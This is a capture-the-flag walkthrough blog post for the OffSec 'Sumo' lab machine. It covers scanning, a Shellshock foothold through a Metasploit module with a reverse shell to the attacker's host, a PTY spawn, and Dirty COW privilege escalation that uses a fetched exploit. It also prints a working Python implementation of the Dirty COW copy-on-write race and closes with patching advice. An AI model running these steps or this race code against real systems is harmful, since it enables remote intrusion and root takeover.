Hacking, Copy on Write Exploit, Cybersecurity

OffSec — Sumo Walkthrough

A walkthrough with my tactics, techniques, and procedures.

xocybersec
Infosec WatchTower

--

Reconnaissance/Scanning:

Let’s start things off with a network scan to see which ports are open and the services running on each.

# -A already enables -O, -sC and -sV (plus traceroute); -p- scans all 65535 TCP ports
$ nmap -A -O -sC -sV -p- <machine_IP>
Nmap scan results

Scanning for directories with Gobuster:

Gobuster results for port 80 scan

I couldn’t find any other directories with gobuster, no other hosts/subdomains, and I didn’t find any other ports open after scanning again.

I decided to use the tool Nikto to see if that could find anything.

$ nikto -h <machine_IP>
Nikto scan results

Very interesting: the Nikto scan flagged the CGI script at /cgi-bin/test as a potential attack vector for Shellshock (CVE-2014-6271), the bash environment-variable function-parsing bug.

Initial foothold:

This time I'll use the Metasploit Framework to get my foothold.

The module of choice is:

exploit/multi/http/apache_mod_cgi_bash_env_exec

There are a few options to set once the module is selected:

RHOSTS – <machine_IP>
TARGETURI – /cgi-bin/test (the path to the CGI script that Nikto flagged; the host comes from RHOSTS)
LHOST – <attack_IP> (the address the reverse shell calls back to)
LPORT – <PORT_of_choice>

NOTE: make sure nothing else on the attack machine is already listening on the port you chose for LPORT. Also, don't pick the same port as the SRVPORT option.

Got initial access!

Proof of reverse shell as www-data

I’ll be taking that flag now.

Proof of user flag

To get a standard shell and be able to navigate better and use more commands, I'll run the shell command within meterpreter:

# drop from meterpreter into a standard shell on the target
meterpreter > shell

# check whether python is installed so I can spawn a PTY and get a stable shell (if only python3 is present, use python3 in the next command)
$ which python

# one-liner to spawn a PTY, which makes the shell stable (job control, tab completion, and password prompts from su/sudo work)
$ python -c 'import pty; pty.spawn("/bin/bash")'
Stabilized shell

Exploit:

I checked a few ways to escalate privileges: cron jobs, binaries with the SUID bit set, hidden folders, the SSH directory, and lastly the kernel version running on the machine.

Command showing the kernel version

I checked searchsploit for exploits against that kernel version.

Snippet of searchsploit results

The results show that the machine is potentially vulnerable to CVE-2016-5195, the "Dirty COW" kernel exploit. Info found here. Note that searchsploit matches on the version string, so a distribution kernel may already carry a backported fix; the reliable test is to run the proof of concept.

"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system."
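To make that description concrete, here is an added example (my own code, not the walkthrough's exploit and not the exploit-db script it used) that reproduces the two ingredients of the bug on a throwaway file the current user owns, so it is safe to run anywhere. First, a write through /proc/self/mem into a read-only MAP_PRIVATE mapping, which the kernel must satisfy by copy-on-write: the mapping changes, the file does not. Second, the same write raced against madvise(MADV_DONTNEED), which throws the private copy away; on an unpatched kernel the write can land in the page cache instead, so the file changes even though the process never had write access to it. The iteration count is an assumption chosen to keep the check short; the original proof of concept loops far longer and points at a file the user cannot write to.

```python
"""Copy-on-write behaviour behind Dirty COW (CVE-2016-5195), on a file you own.

Added example, not the walkthrough's exploit. Uses the libc mmap/madvise calls
directly through ctypes so the mapping address is known and can be targeted
through /proc/self/mem, exactly as the original PoC does.
"""
import ctypes
import mmap
import os
import tempfile
import threading

libc = ctypes.CDLL(None, use_errno=True)
libc.mmap.restype = ctypes.c_void_p
libc.mmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int,
                      ctypes.c_int, ctypes.c_int, ctypes.c_long]
libc.madvise.restype = ctypes.c_int
libc.madvise.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int]
libc.munmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t]

MAP_FAILED = ctypes.c_void_p(-1).value
MADV_DONTNEED = getattr(mmap, "MADV_DONTNEED", 4)
PAGE = mmap.PAGESIZE


def make_test_file(content: bytes = b"A" * 64) -> str:
    """Create a throwaway file we own; the probe never touches anything else."""
    fd, path = tempfile.mkstemp(prefix="cow_")
    os.write(fd, content)
    os.close(fd)
    return path


def map_readonly_private(path: str) -> int:
    """mmap(NULL, PAGE, PROT_READ, MAP_PRIVATE, fd, 0); the mapping itself is never writable."""
    fd = os.open(path, os.O_RDONLY)
    addr = libc.mmap(None, PAGE, mmap.PROT_READ, mmap.MAP_PRIVATE, fd, 0)
    os.close(fd)
    if addr is None or addr == MAP_FAILED:
        raise OSError(ctypes.get_errno(), "mmap failed")
    return addr


def cow_write_demo(path: str, payload: bytes = b"B" * 16):
    """Write through /proc/self/mem once. Returns (mapping_changed, file_changed)."""
    original = open(path, "rb").read()
    addr = map_readonly_private(path)
    try:
        memfd = os.open("/proc/self/mem", os.O_RDWR)
        try:
            os.pwrite(memfd, payload, addr)  # forced write: the kernel breaks COW into a private page
        finally:
            os.close(memfd)
        mapping_changed = ctypes.string_at(addr, len(payload)) == payload
    finally:
        libc.munmap(addr, PAGE)
    file_changed = open(path, "rb").read() != original
    return mapping_changed, file_changed


def dirtycow_race(path: str, payload: bytes = b"B" * 16, iterations: int = 100_000) -> bool:
    """Race /proc/self/mem writes against MADV_DONTNEED. True if the file changed (vulnerable)."""
    original = open(path, "rb").read()
    addr = map_readonly_private(path)

    def drop_private_copy():  # thread 1: keep discarding the COW'd page
        for _ in range(iterations):
            libc.madvise(addr, PAGE, MADV_DONTNEED)

    def write_through_procmem():  # thread 2: keep forcing writes at the same address
        memfd = os.open("/proc/self/mem", os.O_RDWR)
        try:
            for _ in range(iterations):
                try:
                    os.pwrite(memfd, payload, addr)
                except OSError:
                    continue  # a transient failure mid-race is expected and harmless
        finally:
            os.close(memfd)

    threads = [threading.Thread(target=drop_private_copy),
               threading.Thread(target=write_through_procmem)]
    try:
        for t in threads:
            t.start()
        for t in threads:
            t.join()
    finally:
        libc.munmap(addr, PAGE)
    return open(path, "rb").read() != original


def run_selftest(iterations: int = 100_000) -> dict:
    """Run both demos against a fresh temp file and clean up."""
    path = make_test_file()
    try:
        mapping_changed, file_changed = cow_write_demo(path)
        return {"mapping_changed": mapping_changed,
                "file_changed_by_cow_write": file_changed,
                "vulnerable": dirtycow_race(path, iterations=iterations)}
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(run_selftest())
```

Run it as an unprivileged user on the target. A True for "vulnerable" is conclusive; a False after a short run is not proof the kernel is fixed, because the race is probabilistic and the real exploit hammers the same two loops for millions of iterations.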

Here's a snippet via exploit-db[.]com of the code's own instructions on how to compile and run it.

Snippet of how to use the exploit

I downloaded the script to my attack machine, served it with a simple Python HTTP server, fetched it from the target machine, and followed the instructions in the file to compile and execute it.

NOTE: Whenever I am downloading anything to a machine that I’ve compromised, I’ll be in a directory that the compromised user can write to. (usually /tmp or /opt)

Script compiled and executed

Privilege Escalation:

The script creates a new user with root privileges, and now I can switch to that user.

Proof of privilege escalation

Time to get that root flag!

Proof of root flag

Reporting:

  • Patch bash to close Shellshock (CVE-2014-6271) and update the kernel to a release that fixes Dirty COW (CVE-2016-5195); both are old, well-known issues with vendor fixes available.
  • Remove the test CGI script at /cgi-bin/test and disable mod_cgi where it is not needed, so a future bash bug has no remote trigger.
  • More generally, keep all software and hardware patched and up to date with the latest security releases.

Note from Publication: This story was uploaded with the permission of user "xocybersec" on 2/1/24. Please direct any feedback, comments, or citations to the original writer! Thank you — Infosec WatchTower

© [2024] Infosec WatchTower. All rights reserved. Unauthorized use or reproduction of content is prohibited. For inquiries, contact Infosec WatchTower.
